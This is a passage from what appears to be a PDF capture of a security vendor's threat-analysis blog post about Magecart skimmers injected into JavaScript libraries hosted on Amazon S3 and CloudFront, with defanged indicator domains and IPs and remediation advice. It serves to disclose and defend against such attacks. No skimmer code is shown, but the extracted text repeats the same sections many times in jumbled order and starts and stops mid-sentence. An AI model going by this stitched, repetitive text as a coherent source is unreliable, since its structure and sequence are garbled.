a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 298 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 299 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 300 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 301 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 302 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 303 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 304 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 305 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 306 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 307 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 308 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 309 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 310 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 311 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 312 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 313 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 314 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 315 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 316 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 317 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 318 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 319 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 320 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 321 of 351\n\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 322 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 323 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 324 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 325 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 326 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 327 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 328 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 329 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 330 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise 